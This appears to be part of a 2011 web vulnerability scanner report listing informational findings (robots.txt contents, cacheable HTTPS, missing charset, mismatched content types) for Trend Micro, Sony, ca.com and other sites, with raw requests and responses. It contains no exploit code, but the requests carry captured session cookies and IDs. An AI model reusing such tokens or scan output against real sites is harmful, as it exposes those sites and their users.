Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/plain
Content-Length: 178
Last-Modified: Thu, 30 Jun 2011 08:34:38 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /download.php
Disallow: /report.php
Disallow: /raw.php
Disallow: /embed.php
Disallow: /embed_iframe.php
Disallow: /embed_js.php
Disallow: /diff.php

17.4. https://store.trendmicro.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /store

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: store.trendmicro.com

Response

HTTP/1.1 200 OK
ETag: "49-3ebbc10b"
Content-Type: text/plain
Last-Modified: Fri, 09 May 2003 14:54:03 GMT
Connection: close
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=0+0;age=0;ecid=67000669097,0)
Content-Length: 73
Date: Thu, 02 Jun 2011 21:28:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Accept-Ranges: bytes

User-agent: Ultraseek
Disallow: /
User-agent: Inktomi Search
Disallow: /

17.5. http://www.javalobby.org/articles/acegisecurity/part1.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.javalobby.org

Response

HTTP/1.0 200 OK
Server: Resin/3.2.1
ETag: "A/EKk8WQ8Th"
Last-Modified: Tue, 14 Oct 2008 18:02:16 GMT
Cache-Control: max-age=5
Expires: Tue, 06 Sep 2011 17:55:40 GMT
Content-Type: text/plain
Content-Length: 844
Date: Tue, 06 Sep 2011 17:55:35 GMT

User-Agent: Googlebot
Disallow: /account!default.jspa
Disallow: /account.jspa
Disallow: /av/javapolis/createorlogin!default.jspa
Disallow: /css
Disallow: /discussionContext/showThreaded/frm/javalobby

...[SNIP]...

17.6. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.javaworld.com

Response

HTTP/1.1 200 OK
Age: 3946
Date: Tue, 06 Sep 2011 17:45:53 GMT
Cache-Control: max-age=600 ,public
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "7340c3-3e3-48824a805df80"
Server: Apache/2.2.3 (CentOS)
Set-Cookie: Apache=173.192.135.178.1315331027247935; path=/; expires=Thu, 05-Sep-13 17:43:47 GMT
Last-Modified: Thu, 03 Jun 2010 18:48:46 GMT
Accept-Ranges: bytes
Content-Length: 995
Content-Type: text/plain; charset=UTF-8

# This robot.txt file should turn on ALL robots, crawlers and worms for visting
# ALL of your pages. The URL I extracted this from is at:
#
# http://info.webcrawler.com/mak/projects/robots/norobots
...[SNIP]...

17.7. http://www.viddler.com/embed/dca1712/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viddler.com
Path:   /embed/dca1712/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.viddler.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:09 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 11 Oct 2010 13:24:54 GMT
ETag: "780767-23-492574927d580"
Accept-Ranges: bytes
Content-Length: 35
Vary: Accept-Encoding

User-Agent: *
Disallow: /search/?


18. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /favicon.ico

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /favicon.ico HTTP/1.1
Host: store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000

Response

HTTP/1.1 200 OK
ETag: "37e-4b6b21a0"
Content-Type: text/plain
Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=21646;ecid=97070579830,0)
Content-Length: 894
Date: Thu, 02 Jun 2011 21:05:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app93
Accept-Ranges: bytes

..............h.......(....... ...............H...H...........................................................VVW        
       
       
                                                                                       .....tOL+.        
       
       
                                       ...Q.        

...[SNIP]...

19. HTML does not specify charset  previous  next
There are 4 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


19.1. http://display.digitalriver.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Request

GET /?aid=244&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:02 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:02 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:02 GMT
Content-Length: 206
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_scr
...[SNIP]...

19.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYSearchAjax

Request

GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 811
Content-Type: text/html
Content-Language: en-US
Content-Length: 811
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Cache-Control: private


{"ResultSet": {
"suggestionList": [
{
"value": "XSS680CX",
"description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers",
"img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C
...[SNIP]...

19.3. http://wd.sharethis.com/api/getCount2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 17:46:04 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 270

(function(){stButtons.processCB({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\
...[SNIP]...

19.4. http://www.kb.sony.com/selfservice/common/bg_323232.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/bg_323232.html

Request

GET /selfservice/common/bg_323232.html HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"67-1196120688000"
Last-Modified: Mon, 26 Nov 2007 23:44:48 GMT
Content-Type: text/html
Content-Length: 67
Date: Tue, 06 Sep 2011 18:51:21 GMT

<html>
<head>
</head>
<body bgcolor="#323232">
</body>
</html>

20. Content type incorrectly stated  previous  next
There are 6 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


20.1. http://display.digitalriver.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=244&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:02 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:02 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:02 GMT
Content-Length: 206
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_scr
...[SNIP]...

20.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYSearchAjax

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 811
Content-Type: text/html
Content-Language: en-US
Content-Length: 811
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Cache-Control: private


{"ResultSet": {
"suggestionList": [
{
"value": "XSS680CX",
"description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers",
"img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C
...[SNIP]...

20.3. https://store.trendmicro.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://store.trendmicro.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000

Response

HTTP/1.1 200 OK
ETag: "37e-4b6b21a0"
Content-Type: text/plain
Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=21646;ecid=97070579830,0)
Content-Length: 894
Date: Thu, 02 Jun 2011 21:05:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app93
Accept-Ranges: bytes

..............h.......(....... ...............H...H...........................................................VVW        
       
       
                                                                                       .....tOL+.        
       
       
                                       ...Q.        

...[SNIP]...

20.4. http://wd.sharethis.com/api/getCount2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 17:46:04 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 270

(function(){stButtons.processCB({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\
...[SNIP]...

20.5. https://www.ca.com/images/icons/checkmark.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.ca.com
Path:   /images/icons/checkmark.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/icons/checkmark.gif HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Mon, 01 Mar 2010 16:18:10 GMT
Accept-Ranges: bytes
ETag: "d4c6ebc85ab9ca1:0"
